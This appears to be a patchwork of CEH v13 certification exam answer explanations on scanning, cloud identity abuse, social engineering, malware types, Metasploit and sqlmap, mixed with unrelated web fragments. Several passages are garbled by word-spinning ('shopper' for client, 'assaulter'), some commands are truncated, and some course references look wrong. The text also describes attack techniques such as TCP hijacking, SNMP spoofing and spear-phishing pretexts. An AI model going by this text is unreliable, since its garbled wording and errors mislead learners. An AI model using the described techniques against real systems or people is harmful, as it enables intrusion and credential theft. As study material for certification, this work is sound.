Getting a live stream of the gadget’s screen should be possible effectively by consistently requesting screen captures and showing or recording them distantly.

It is imperative to take note of that other than the underlying single purpose of disappointment, approving the vindictive PC, there is no other component that forestalls this proceeded with access. Likewise, there isn’t anything that informs the clients that by approving the PC they permit admittance to their gadget even in the wake of detaching the USB link.

CEH cloud security modules highlight that Azure Managed Identities allow workloads such as functions, VMs, and automation tasks to authenticate to Azure resources without storing secrets. If an attacker obtains the token associated with a managed identity, they can impersonate that identity and access any Azure resources it is permitted to use. In this scenario, the captured access token is used to authenticate via Azure PowerShell and retrieve storage account keys, demonstrating unauthorized privilege usage by hijacking the managed identity. This aligns directly with managed identity abuse, where attackers leverage identity tokens instead of user credentials. NSG rule gathering and AzureGraph enumeration are reconnaissance activities, and Stormspotter is used for visualizing attack paths, not abusing identities. Therefore, this scenario clearly illustrates exploitation of managed identities.

In CEH v13 Module 16: Cloud Computing and Container Security, Cloudborne attacks are described as threats specific to bare-metal cloud infrastructure.

Characteristics of a Cloudborne Attack:

Targets firmware-level vulnerabilities in reused physical servers.

Malware or backdoors can persist even after VM or OS reinstallation.

Can lead to compromise of new tenants or clients once servers are reallocated.

First highlighted in Project X by Eclypsium.

Option Clarification:

A. MITC: Exploits synchronization in cloud storage, not firmware.

B. Cryptojacking: Mining cryptocurrency using cloud resources.

C. Cloudborne attack: Correct — targets firmware on bare-metal cloud servers.

D. Metadata spoofing: Exploits cloud instance metadata services, unrelated to firmware.

Restrict results to those of a certain filetype. E.g., PDF, DOCX, TXT, PPT, etc. Note: The “ext:” operator can also be used—the results are identical.

Example: apple filetype:pdf / apple ext:pdf

Comprehensive and Detailed Explanation:

LDAP (Lightweight Directory Access Protocol) uses a hierarchical data structure similar to a directory tree. SQL databases use a relational structure with tables, rows, and columns.

Because of its hierarchical nature:

LDAP is excellent for parent-child relationships.

It struggles with representing many-to-many or many-to-one relationships efficiently.

From CEH v13 Courseware:

Module 4: Enumeration → LDAP Basics

This Social Engineering scam involves an exchange of information that can benefit both the victim and the trickster. Scammers would make the prey believe that a fair exchange will be present between both sides, but in reality, only the fraudster stands to benefit, leaving the victim hanging on to nothing. An example of a Quid Pro Quo is a scammer pretending to be an IT support technician. The con artist asks for the login credentials of the company’s computer saying that the company is going to receive technical support in return. Once the victim has provided the credentials, the scammer now has control over the company’s computer and may possibly load malware or steal personal information that can be a motive to commit identity theft.

"A quid pro quo attack (aka something for something” attack) is a variant of baiting. Instead of baiting a target with the promise of a good, a quid pro quo attack promises a service or a benefit based on the execution of a specific action."

CEH v13 explains that fingerprinting is a core reconnaissance technique used to identify software versions, server types, and configurations by analyzing how systems respond to crafted or abnormal input. When testers send malformed HTTP verbs, unusual headers, or atypical URI structures, the server’s specific response codes, banners, and error messages reveal distinctive behavioral patterns. These patterns allow tools like httprint, Nmap NSE scripts, and custom probes to match the responses to known server profiles. This technique is part of active reconnaissance, enabling attackers to determine vulnerabilities associated with specific versions. Phishing (Option B) is unrelated to protocol analysis. Session fixation (Option C) manipulates session identifiers, not HTTP response patterns. Persistent XSS (Option D) relies on web application vulnerabilities, not server fingerprinting. Thus, the tester is performing HTTP-based server fingerprinting.

In an inference-based assessment, scanning starts by building an inventory of the protocols found on the machine. After finding a protocol, the scanning process starts to detect which ports are attached to services, such as an email server, web server, or database server. After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.

Gathering Wordlist from the Target Website An attacker uses the CeWL tool to gather a list of words from the target website and perform a brute-force attack on the email addresses gathered earlier. # Cewl (P.200/184)

The command nmap -sX initiates what is known as a Xmas Scan. This type of scan is used to analyze how a target system responds to TCP packets with unusual flag combinations, helping the attacker identify live hosts and open ports without completing a full TCP handshake.

In the Xmas scan, three specific TCP flags are set in the packet:

URG (Urgent)

PSH (Push)

FIN (Finish)

This combination makes the packet appear "lit up like a Christmas tree," hence the name Xmas scan. These packets are sent to target ports to observe the system’s behavior, especially when it does not follow standard RFC 793 behavior.

Closed ports will usually respond with a RST (reset).

Open ports may not respond at all, depending on the operating system and configuration.

This method is typically used to evade detection by firewalls and intrusion detection systems that expect normal TCP traffic patterns.

Reference – CEH v13 Official Study Guide:

Module 03: Scanning Networks, Section: “TCP Scan Types”, Subsection: “Xmas Tree Scan”, Page Reference: typically listed under TCP Flag Scanning Techniques.

CEH v13 iLabs and practical guidance in CEH Engage also cover this scan in reconnaissance simulations.

Incorrect Options Explained:

A. SYN scan (-sS) sets only the SYN flag.

C. ACK scan (-sA) sets the ACK flag.

D. SYN and ACK flags are used in TCP handshake, not in Xmas scan.

Comprehensive and Detailed Explanation:

The OpenSSL command-line utility s_client is used to test SSL/TLS connections.

Correct syntax:

openssl s_client -connect

This command will initiate a TLS connection to port 443 on the given domain and allow you to inspect certificates, cipher suites, and server responses.

From CEH v13 Courseware:

Module 12: Cryptography → SSL/TLS Testing Tools

CEH IoT security modules describe insecure network services as vulnerabilities arising when IoT devices communicate over unencrypted channels, use unauthenticated update mechanisms, or expose services that fail to validate data integrity. When operational commands and firmware updates are transmitted over HTTP without cryptographic safeguards, attackers can intercept, replay, or modify the data stream. Firmware integrity verification is a critical component of secure device lifecycle management. Without it, adversaries can perform firmware injection, allowing them remote control, persistent compromise, or sabotage of device functionality. This aligns directly with insecure network services, which CEH defines as improperly protected communication mechanisms and service interactions within IoT ecosystems. Insecure ecosystem interfaces generally relate to cloud APIs and web dashboards, insecure default settings involve weak credentials or factory configurations, and insufficient privacy protection relates to data confidentiality rather than command manipulation. The described scenario most clearly fits insecure network services.

CEH notes that cloud IAM misconfigurations can unintentionally grant broad access. If any authenticated cloud account is permitted read/write access, attackers can simply authenticate with their own cloud identity and directly interact with the misconfigured storage buckets, enabling data exfiltration or manipulation.

In CEH v13 Module 06: Malware Threats, stealth viruses are covered as advanced malware that can evade detection by:

Intercepting system calls related to file access.

Masking their presence in files, memory, or on disk.

Restoring original code temporarily to fool signature-based scanners.

These capabilities allow stealth viruses to:

Avoid detection by antivirus scanners.

Operate undisturbed until triggered.

Option Clarification:

A. Cavity virus: Hides in unused file space but doesn't evade as effectively.

C. File-extension virus: Exploits deceptive file names but is often detected.

D. Macro virus: Targets office documents, not highly evasive.

Correct answer is B. Stealth virus.

Jamming and scrambling are attacks targeting the physical layer of the OSI model, often affecting wireless communication by generating interference to disrupt signal transmission. To mitigate such attacks, one advanced countermeasure is the use of Cognitive Radios.

According to CEH v13 Official Courseware:

Cognitive radios are intelligent radio systems capable of sensing the radio frequency (RF) environment and dynamically adjusting their operating parameters (e.g., frequency, modulation) to avoid interference and jamming.

They enable dynamic spectrum access and help in improving spectrum efficiency and resilience against jamming.

This approach falls under physical-layer security mechanisms.

Incorrect Options:

A. gets and strcpy are unsafe functions vulnerable to buffer overflow, not relevant to DoS protection.

B. Allowing all types of packets increases risk and is not a mitigation.

D. TCP SYN cookies protect against SYN flood attacks and disabling them weakens security.

Reference – CEH v13 Official Courseware:

Module 10: Denial-of-Service (DoS) Attacks

Section: “Defensive Strategies Against Jamming and DoS Attacks”

Subsection: “Physical Layer Countermeasures”

===========

A TCP/IP hijack is an attack that spoofs a server into thinking it’s talking with a sound client, once actually it’s communication with an assaulter that has condemned (or hijacked) the tcp session. Assume that the client has administrator-level privileges, which the attacker needs to steal that authority so as to form a brand new account with root-level access of the server to be used afterward. A tcp Hijacking is sort of a two-phased man-in-the-middle attack. The man-in-the-middle assaulter lurks within the circuit between a shopper and a server so as to work out what port and sequence numbers are being employed for the conversation.

First, the attacker knocks out the client with an attack, like Ping of Death, or ties it up with some reasonably ICMP storm. This renders the client unable to transmit any packets to the server. Then, with the client crashed, the attacker assumes the client’s identity so as to talk with the server. By this suggests, the attacker gains administrator-level access to the server.

One of the most effective means of preventing a hijack attack is to want a secret, that’s a shared secret between the shopper and also the server. looking on the strength of security desired, the key may be used for random exchanges. this is often once a client and server periodically challenge each other, or it will occur with each exchange, like Kerberos.

CEH v13 identifies spear-phishing as one of the most effective and targeted social engineering methods. It involves crafting highly personalized messages that reference real events, internal processes, or upcoming activities to build credibility and reduce suspicion. In this scenario, referencing board meetings—an event executive assistants frequently handle—creates a believable and urgent context for the request. CEH emphasizes that personalization significantly increases success rates because recipients perceive the sender as someone with legitimate access to internal information. A phone call impersonating IT support (Option B) is less convincing for retrieving agenda access-specific credentials. Mass phishing (Option C) lacks personalization and is easily flagged. LinkedIn social engineering (Option D) is long-term and less effective for obtaining immediate credentials. Therefore, a tailored spear-phishing email is the most effective approach.

Windows TTL 128, Linux TTL 64, OpenBSD 255 ...

Time to Live (TTL) represents to number of 'hops' a packet can take before it is considered invalid. For Windows/Windows Phone, this value is 128. This value is 64 for Linux/Android.

A hybrid attack combines the benefits of both dictionary and brute-force attacks. It takes words from a dictionary and applies modifications such as:

Appending or prepending numbers or symbols

Changing case (e.g., admin → Admin1!)

Leetspeak substitutions (e.g., p@ssw0rd)

From CEH v13 Official Courseware:

Module 6: Malware Threats

Topic: Password Cracking Methods

CEH v13 Study Guide states:

“A hybrid attack is a combination of dictionary and brute-force techniques. It takes dictionary words and mutates them to cover common variations, making it more effective than pure dictionary attacks.”

Incorrect Options:

A/B/D: These are not standard terminology in cryptographic or password auditing literature.

An evil twin attack is a hack attack in which a hacker sets up a fake Wi-Fi network that looks like a legitimate access point to steal victims’ sensitive details. Most often, the victims of such attacks are ordinary people like you and me.

The attack can be performed as a man-in-the-middle (MITM) attack. The fake Wi-Fi access point is used to eavesdrop on users and steal their login credentials or other sensitive information. Because the hacker owns the equipment being used, the victim will have no idea that the hacker might be intercepting things like bank transactions.

An evil twin access point can also be used in a phishing scam. In this type of attack, victims will connect to the evil twin and will be lured to a phishing site. It will prompt them to enter their sensitive data, such as their login details. These, of course, will be sent straight to the hacker. Once the hacker gets them, they might simply disconnect the victim and show that the server is temporarily unavailable.

ADDITION: It may not seem obvious what happened. The problem is in the question statement. The attackers were not Alice and John, who were able to connect to the network without a password, but on the contrary, they were attacked and forced to connect to a fake network, and not to the real network belonging to Jane.

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.

Its best-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

The Metasploit Project includes anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Metasploit is pre-installed in the Kali Linux operating system.

The basic steps for exploiting a system using the Framework include.

1. Optionally checking whether the intended target system is vulnerable to an exploit.

2. Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and macOS systems are included).

3. Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server). Metasploit often recommends a payload that should work.

4. Choosing the encoding technique so that hexadecimal opcodes known as "bad characters" are removed from the payload, these characters will cause the exploit to fail.

5. Executing the exploit.

This modular approach – allowing the combination of any exploit with any payload – is the major advantage of the Framework. It facilitates the tasks of attackers, exploit writers and payload writers.

Comprehensive and Detailed Explanation:

A covert channel is any communication path that allows data to be transferred in violation of a system’s security policy. It’s commonly used by malware or Trojans to exfiltrate data or send commands undetected.

Examples include:

Encoding data in TCP headers (unused bits)

Timing of packets (timing channel)

Use of legitimate protocols to piggyback malicious traffic

From CEH v13 Courseware:

Module 6: Malware Threats → Trojans and Covert Channels

Comprehensive and Detailed Explanation:

The Snort rule syntax:

alert tcp any any → 192.168.1.0/24 111

This means: Alert on TCP traffic from any IP and any port, going to any host in the 192.168.1.0/24 subnet on destination port 111.

The content "|00 01 86 a5|" identifies a mountd access signature pattern.

Port 111 is used by SunRPC (commonly associated with mountd in UNIX environments).

From CEH v13 Courseware:

Module 13: IDS, Firewalls and Honeypots → Understanding Snort Rules

Rootkits can deeply infect and compromise a system’s kernel, making them very difficult to detect or remove fully. Even advanced antivirus solutions may miss them.

The most secure and recommended response is:

Completely wipe the compromised system.

Reinstall the OS from known good (clean) media.

Apply all patches and updates.

From CEH v13 Official Courseware:

Module 6: Malware Threats → Rootkit Handling

Incorrect Options:

A: Copying files might transfer infected components.

B: Trap and trace is investigative, not remedial.

C: Deleting files may not fully remove the rootkit.

D: Backups might be infected if taken post-compromise.

If the token itself (e.g., hardware key or smartcard) performs offline verification of the PIN, it can be physically attacked. An attacker can:

Steal the token

Try all possible PIN combinations (0000–9999)

Bypass limits if no lockout mechanisms exist

This is a brute-force attack — the attacker tries every combination until the correct one is found.

From CEH v13 Courseware:

Module 6: Malware and Authentication

Module 20: Identity and Access Management

Incorrect Options:

A: Birthday attacks are related to hash collisions.

C: MITM involves intercepting communication, not offline brute-force.

D: Smurf is a DoS attack, not related to token/PIN systems.

Hashing algorithms are specifically designed to ensure data integrity. A hash function takes an input and returns a fixed-length string, called a hash or message digest. Even a small change in the input results in a completely different hash, making it useful for detecting tampering.

Common hashing algorithms include:

MD5 (now obsolete for secure uses)

SHA-1, SHA-2, SHA-3

HMAC (Hashed Message Authentication Code)

From CEH v13 Courseware:

Module 20: Cryptography

Topic: Hash Functions and Data Integrity

CEH v13 Study Guide states:

“Hashing algorithms provide integrity by generating a unique digital fingerprint of data. Any alteration in the message content will result in a different hash value, indicating that the integrity has been compromised.”

Incorrect Options:

A: Symmetric algorithms provide confidentiality.

B: Asymmetric algorithms provide confidentiality and authentication.

D: "Integrity algorithms" is not a formal cryptographic term.

Social engineering attacks that target business processes are especially effective when they mimic legitimate workflows. CEH learning materials emphasize that attackers often exploit trust relationships and organizational procedures rather than attempting broad or generic phishing methods. In the context of HR operations, onboarding portals are highly trusted and frequently accessed by new employees who expect to enter personal information, submit documents, and receive initial network credentials. By creating a fake onboarding portal that closely resembles the organization’s internal system, an attacker can collect credentials without triggering suspicion because the action being requested appears normal and expected. This method leverages procedural familiarity, brand consistency, and the implied authority of HR communications, making it far more effective than generic phishing emails or unsolicited social media messages. Phone calls, while sometimes useful, involve real-time interaction and increase the chance of detection. The fake portal, however, seamlessly integrates into existing processes, making it the most effective and lowest-profile approach for acquiring network credentials.

Since this question refers specifically to analyzing a wireless network, it is obvious that we need an option with AirPcap (Riverbed AirPcap USB-based adapters capture 802.11 wireless traffic for analysis). Since it works with two traffic analyzers SteelCentral Packet Analyzer (Cascade Pilot) or Wireshark, the correct option would be "Wireshark with Airpcap."

NOTE: AirPcap adapters no longer available for sale effective January 1, 2018, but a question on this topic may occur on your exam.

===========

STARTTLS is an SMTP command that allows the client to upgrade an existing insecure connection to a secure, encrypted TLS connection. It is widely supported by SMTP servers and used to protect email transmissions from interception.

Reference – CEH v13 Official Study Guide:

Module 20: Cryptography

Section: Secure Email Communication

Quote:

“STARTTLS is an SMTP command used to initiate encryption on an existing plaintext connection using TLS.”

Incorrect Options:

A. Opportunistic TLS is a concept, not a command

B & C. UPGRADETLS and FORCETLS are not valid SMTP commands

File created by Bash, a Unix-based shell program commonly used on Mac OS X and Linux operating systems; stores a history of user commands entered at the command prompt; used for viewing old commands that are executed.

BASH_HISTORY files are hidden files with no filename prefix. They always use the filename .bash_history.

NOTE: Bash is that the shell program employed by Apple Terminal.

Our goal is to assist you understand what a file with a *.bash_history suffix is and the way to open it.

The Bash History file type, file format description, and Mac and Linux programs listed on this page are individually researched and verified by the FileInfo team. we attempt for 100% accuracy and only publish information about file formats that we’ve tested and validated.

If SNMP access is restricted to specific IP addresses (e.g., 192.168.1.0/24), you can bypass access controls by:

Spoofing the source IP to fall within that allowed range.

Using a SNMP set request to instruct the device (e.g., to copy its configuration to a TFTP server).

This is a classic SNMP spoofing attack.

From CEH v13 Courseware:

Module 4: Enumeration → SNMP Enumeration Attacks

The official management decision given by a senior agency official to authorize operation of an information system and to explicitly accept the risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals, based on the implementation of an agreed-upon set of security controls.

formal declaration by a designated accrediting authority (DAA) or principal accrediting authority (PAA) that an information system is approved to operate at an acceptable level of risk, based on the implementation of an approved set of technical, managerial, and procedural safeguards. See authorization to operate (ATO). Rationale: The Risk Management Framework uses a new term to refer to this concept, and it is called authorization.

Identifies the information resources covered by an accreditation decision, as distinguished from separately accredited information resources that are interconnected or with which information is exchanged via messaging. Synonymous with Security Perimeter.

For the purposes of identifying the Protection Level for confidentiality of a system to be accredited, the system has a conceptual boundary that extends to all intended users of the system, both directly and indirectly connected, who receive output from the system. See authorization boundary. Rationale: The Risk Management Framework uses a new term to refer to the concept of accreditation, and it is called authorization. Extrapolating, the accreditation boundary would then be referred to as the authorization boundary.

Once a suitable zombie has been found, performing a scan is easy. Simply specify the zombie hostname to the -sI option and Nmap does the rest. Example 5.19 shows an example of Ereet scanning the Recording Industry Association of America by bouncing an idle scan off an Adobe machine named Kiosk.

Example 5.19. An idle scan against the RIAA

# nmap -Pn -p-

Starting Nmap

Idlescan using zombie kiosk.adobe.com (192.150.13.111:80); Class: Incremental

Nmap scan report for 208.225.90.120

(The 65522 ports scanned but not shown below are in state: closed)

Port       State       Service

21/tcp     open        ftp

25/tcp     open        smtp

80/tcp     open        http

111/tcp    open        sunrpc

135/tcp    open        loc-srv

443/tcp    open        https

1027/tcp   open        IIS

1030/tcp   open        iad1

2306/tcp   open        unknown

5631/tcp   open        pcanywheredata

7937/tcp   open        unknown

7938/tcp   open        unknown

36890/tcp  open        unknown

Nmap done: 1 IP address (1 host up) scanned in 2594.47 seconds

Blind SQL injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack has traditionally been considered time-intensive because a new statement needed to be crafted for each bit recovered, and depending on its structure, the attack may consist of many unsuccessful requests. Recent advancements have allowed each request to recover multiple bits, with no unsuccessful requests, allowing for more consistent and efficient extraction.

Patch management is that the method that helps acquire, test and install multiple patches (code changes) on existing applications and software tools on a pc, enabling systems to remain updated on existing patches and determining that patches are the suitable ones. Managing patches so becomes simple and simple.

Patch Management is usually done by software system firms as a part of their internal efforts to mend problems with the various versions of software system programs and also to assist analyze existing software system programs and discover any potential lack of security features or different upgrades.

Software patches help fix those problems that exist and are detected solely once the software’s initial unharness. Patches mostly concern security while there are some patches that concern the particular practicality of programs as well.

Comprehensive and Detailed Explanation:

The correct file name is /var/log/auth.log (not auth.fesg). “auth.fesg” is a typo or does not exist by default in Linux systems.

Linux login records include:

/var/log/auth.log – authentication logs

/var/log/wtmp – records login sessions

/var/log/btmp – records failed logins

/var/log/user.log – logs user-level messages (optional)

Therefore, B is not a valid log file.

From CEH v13 Courseware:

Module 6: System Hacking → Covering Tracks in Linux

CEH v13 details that fragmentation attacks are a common IDS evasion strategy. Signature-based IDS systems depend on reassembling packets to detect malicious patterns. When attackers fragment TCP headers into smaller segments, the IDS may be unable to reconstruct the original packet sequence, especially if the fragments are intentionally crafted to confuse reassembly buffers. Meanwhile, the target host typically recombines the fragments correctly, allowing the scan or payload to pass undetected. This technique is specifically discussed under IDS evasion methods, where fragmentation prevents complete packet inspection. Options A and B describe unrelated evasion mechanisms such as IP spoofing and MAC spoofing, and Option C does not fundamentally affect IDS reconstruction. The tester is clearly using packet fragmentation to evade detection while still mapping open ports successfully.

The scenario describes a situation where a hacker infects an internet-facing server and leverages it to perform malicious activities such as sending spam emails, participating in distributed denial-of-service (DDoS) attacks, or hosting spam content. This behavior is characteristic of a Botnet Trojan.

According to the CEH v13 Official Courseware and Study Guide:

A Botnet Trojan is a type of malware that transforms infected machines into bots (also called zombies), which can be remotely controlled by an attacker (bot herder or bot master).

These bots become part of a botnet — a network of compromised machines used for coordinated cyberattacks including:

Sending unsolicited spam emails (junk mail)

Participating in DDoS attacks

Hosting or distributing malware and phishing content

The infected machine can receive commands from a command-and-control (C&C) server and act in concert with other infected machines to amplify attacks or spread malware.

Incorrect Options:

B. Banking Trojans are designed specifically to steal financial data such as online banking credentials.

C. Turtle Trojans is not a valid classification in CEH v13 or cybersecurity literature (may be a distractor).

D. Ransomware Trojans encrypt data and demand a ransom for decryption, not typically used for junk mail or botnet activities.

Reference – CEH v13 Official Courseware:

Module 06: Malware Threats

Section: “Types of Trojans”

Subsection: “Botnet Trojans”

CEH v13 eBook or Study Guide — usually found under “Trojan Classifications by Payload”

Practical labs in CEH Engage and iLabs also demonstrate botnet functionality using tools like Zeus and Emotet in real-world botnet infection scenarios.

In CEH v13 Module 05: System Hacking, once an attacker gains access to hashed passwords, cracking tools are employed to reverse or brute-force them.

Tool Breakdown:

John the Ripper: A powerful password cracking tool that supports many hash formats.

Hashcat: GPU-based, extremely fast password hash cracking tool.

THC-Hydra: Used for online attacks (e.g., SSH, FTP brute force).

Netcat: Not a password cracking tool — it’s a network utility used for:

Remote shell connections

Banner grabbing

File transfers

Port scanning

Therefore:

C. Netcat is the correct answer — it is not used for password cracking.

The command uses sqlmap, a powerful SQL injection and database penetration testing tool. The flag -u specifies the target URL, and -dbs instructs sqlmap to enumerate the available databases on the DBMS behind that URL.

Command Breakdown:

-u: Target URL with injectable parameters

-dbs: Retrieve and enumerate all available database names

This is a common first step in identifying vulnerable DBMS structures after confirming SQL injection.

Incorrect Options:

A. Backdoor creation is not the default function of sqlmap.

C. Retrieving SQL statements would require additional options like --trace or --sql-query.

D. Option D is not technically accurate—sqlmap is used for injection and enumeration, not searching statements.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: “SQL Injection Tools and Automation”

Tool Reference: sqlmap usage and options

===========

Software as a service (SaaS) allows users to attach to and use cloud-based apps over the web. Common examples ar email, calendaring and workplace tool (such as Microsoft workplace 365).

SaaS provides a whole software solution that you get on a pay-as-you-go basis from a cloud service provider. You rent the use of an app for your organisation and your users connect with it over the web, typically with an internet browser. All of the underlying infrastructure, middleware, app software system and app knowledge ar located within the service provider’s knowledge center. The service provider manages the hardware and software system and with the appropriate service agreement, can make sure the availability and also the security of the app and your data as well. SaaS allows your organisation to induce quickly up and running with an app at token upfront cost.

Common SaaS scenarios

This tool having used a web-based email service like Outlook, Hotmail or Yahoo! Mail, then you have got already used a form of SaaS. With these services, you log into your account over the web, typically from an internet browser. the e-mail software system is found on the service provider’s network and your messages ar hold on there moreover. you can access your email and hold on messages from an internet browser on any laptop or Internet-connected device.

The previous examples are free services for personal use. For organisational use, you can rent productivity apps, like email, collaboration and calendaring; and sophisticated business applications like client relationship management (CRM), enterprise resource coming up with (ERP) and document management. You buy the use of those apps by subscription or per the level of use.

Advantages of SaaS

Gain access to stylish applications. to supply SaaS apps to users, you don’t ought to purchase, install, update or maintain any hardware, middleware or software system. SaaS makes even sophisticated enterprise applications, like ERP and CRM, affordable for organisations that lack the resources to shop for, deploy and manage the specified infrastructure and software system themselves.

Pay just for what you utilize. you furthermore may economize because the SaaS service automatically scales up and down per the level of usage.

Use free shopper software system. Users will run most SaaS apps directly from their web browser without needing to transfer and install any software system, though some apps need plugins. this suggests that you simply don’t ought to purchase and install special software system for your users.

Mobilise your hands simply. SaaS makes it simple to “mobilise” your hands as a result of users will access SaaS apps and knowledge from any Internet-connected laptop or mobile device. You don’t ought to worry concerning developing apps to run on differing types of computers and devices as a result of the service supplier has already done therefore. additionally, you don’t ought to bring special experience aboard to manage the safety problems inherent in mobile computing. A fastidiously chosen service supplier can make sure the security of your knowledge, no matter the sort of device intense it.

Access app knowledge from anyplace. With knowledge hold on within the cloud, users will access their info from any Internet-connected laptop or mobile device. And once app knowledge is hold on within the cloud, no knowledge is lost if a user’s laptop or device fails.

A Gray Hat hacker operates between ethical (White Hat) and unethical (Black Hat) behavior. They might break into systems without permission but without malicious intent, often reporting vulnerabilities afterward. They perform both offensive and defensive activities.

???? Reference – CEH v13 Official Study Guide, Module 1: Introduction to Ethical Hacking

“Gray Hat hackers may violate ethical standards but not necessarily for personal or financial gain. They typically operate without malicious intent.”

❌ Incorrect options:

A. White Hats are ethical hackers.

B. Suicide Hackers attack without regard for being caught.

D. Black Hats are malicious hackers.

The CEH v13 courseware states that insecure communication occurs when mobile applications transmit sensitive data over unencrypted or weakly encrypted channels, exposing information to interception. When an application uses plain HTTP or does not properly validate certificates, attackers can place themselves between the client and server using a man-in-the-middle (MitM) attack. This allows them to read session tokens, credentials, API keys, or personal user data as it travels across the network. CEH materials emphasize that MitM attacks are the primary exploitation technique for insecure data transmission because they exploit weaknesses in transport-layer security rather than weaknesses in backend code or authentication mechanisms. SQL injection and CSRF attacks target web application logic, not transport encryption. Brute-force attacks target authentication mechanisms and are unrelated to how data is transmitted. Therefore, the most effective exploitation method is intercepting traffic via MitM to capture or manipulate unencrypted communications.

Social engineering is a non-technical attack that manipulates human behavior to gain access to systems or data. It often involves deception (e.g., phishing, pretexting, baiting) and requires no technical expertise or tools, making it a low-tech yet highly effective method.

Reference – CEH v13 Official Study Guide:

Module 9: Social Engineering

Quote:

“Social engineering exploits human psychology and trust to gain unauthorized access. It is considered a low-tech method because it does not require technical means.”

Incorrect Options Explained:

B. Eavesdropping may require technical tools to intercept data.

C. Scanning involves active use of tools to find vulnerabilities.

D. Sniffing is technical and requires tools to capture network traffic.

Employing a tool like Sublist3r, which is designed to enumerate the subdomains of websites using OSINT, would be the most effective method to accomplish this goal. This option works as follows:

Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT (Open Source Intelligence). It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster, and ReverseDNS. Subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist1.

By using Sublist3r, the tester can quickly and efficiently discover the subdomains of the target organization’s website, which can provide valuable information about the network structure, the services offered, the potential vulnerabilities, and the attack surface. Sublist3r can also be used to perform passive reconnaissance, which does not send any packets to the target domain, and thus avoids detection by the target organization12.

The other options are not as effective as option A for the following reasons:

B. Analyzing Linkedin profiles to find employees of the target company and their job titles: This option is not relevant because it does not address the subdomain enumeration task, but the social engineering task. Linkedin is a social networking platform that allows users to create and share their professional profiles, which may include their name, job title, company, skills, education, and contacts. By analyzing Linkedin profiles, the tester may be able to find employees of the target company and their job titles, which can be useful for crafting phishing emails, impersonating employees, or exploiting human weaknesses. However, this option does not help to discover the subdomains of the target organization’s website, which is the goal of this scenario3.

C. Utilizing the Harvester tool to extract email addresses related to the target domain using a search engine like Google or Bing: This option is not sufficient because it does not provide a comprehensive list of subdomains, but only a partial list based on email addresses. The Harvester is a tool that can extract email addresses, subdomains, hosts, employee names, open ports, and banners from different public sources, such as search engines, PGP key servers, and SHODAN computer database. By using the Harvester, the tester may be able to extract some email addresses related to the target domain, which can reveal some subdomains, such as mail.target.com or support.target.com. However, this option does not guarantee to find all the subdomains of the target organization’s website, as some subdomains may not have any email addresses associated with them, or may not be indexed by the search engines4.

D. Using a people search service, such as Spokeo or Intelius, to gather information about the employees of the target organization: This option is not applicable because it does not address the subdomain enumeration task, but the personal information gathering task. Spokeo and Intelius are people search services that can provide various information about individuals, such as their name, address, phone number, email, social media, criminal records, and financial history. By using these services, the tester may be able to gather information about the employees of the target organization, which can be useful for performing background checks, identity theft, or blackmail. However, this option does not help to discover the subdomains of the target organization’s website, which is the goal of this scenario56.

A NULL scan is a type of TCP stealth scan where no flags are set in the TCP header. It is used to identify open or closed ports based on how the target responds to this unexpected packet.

Behavior:

If the port is closed → Target responds with RST (Reset)

If the port is open → No response (on compliant systems like Unix-based OSes)

From CEH v13 Courseware:

Module 03: Scanning Networks

Topic: TCP Flag Scanning

Subsection: NULL Scan

CEH v13 Study Guide states:

“In a NULL scan, if a target port is closed, the system responds with an RST packet as per RFC 793. If the port is open, it typically does not respond, which allows stealthy enumeration of services.”

Incorrect Options:

A. SYN: Initiated by a SYN scan.

B. ACK: Used in ACK scans.

C/D: Not applicable for NULL scans.

F. No response occurs for open ports, not closed ones.

When a NULL scan is sent to a port on a UNIX-based system:

If the port is OPEN: The system does not respond at all.

If the port is CLOSED: The system responds with a RST packet.

This behavior is based on how the TCP stack processes unexpected packets.

From CEH v13 Courseware:

Module 3: Scanning Networks

Topic: Stealth Scanning Techniques → NULL Scan

CEH v13 Official Guide states:

“A NULL scan sends a TCP packet with no flags set. On systems following RFC 793 (like many Unix/Linux), open ports silently drop such packets (no response), while closed ports respond with a TCP RST.”

Incorrect Options:

A–E: Not standard responses for an open port in a NULL scan scenario.

The VRFY commands enables SMTP clients to send an invitation to an SMTP server to verify that mail for a selected user name resides on the server. The VRFY command is defined in RFC 821.

The server sends a response indicating whether the user is local or not, whether mail are going to be forwarded, and so on. A response of 250 indicates that the user name is local; a response of 251 indicates that the user name isn’t local, but the server can forward the message. The server response includes the mailbox name.

Comprehensive and Detailed Explanation From CEH v13 Guide:

The Network Time Protocol (NTP) is used by systems, including Linux servers, to synchronize their clocks with a time server. If NTP fails, time discrepancies may lead to inaccurate log records and affect security monitoring.

CEH v13 Reference:

Module 17: Evading IDS, Firewalls, and Honeypots – Log Tampering

“Accurate timekeeping is essential for proper logging and correlation. NTP ensures system time is synchronized across hosts.”

=============================================================

The honey trap is a technique where an attacker targets a person online by pretending to be an attractive person and then begins a fake online relationship to obtain confidential information about the target company. In this technique, the victim is an insider who possesses critical information about the target organization.

Baiting is a technique in which attackers offer end users something alluring in exchange for

important information such as login details and other sensitive data. This technique relies on

the curiosity and greed of the end-users. Attackers perform this technique by leaving a physical

device such as a USB flash drive containing malicious files in locations where people can easily

find them, such as parking lots, elevators, and bathrooms. This physical device is labeled with a

legitimate company's logo, thereby tricking end-users into trusting it and opening it on their

systems. Once the victim connects and opens the device, a malicious file downloads. It infects

the system and allows the attacker to take control.

For example, an attacker leaves some bait in the form of a USB drive in the elevator with the

label "Employee Salary Information 2019" and a legitimate company's logo. Out of curiosity and

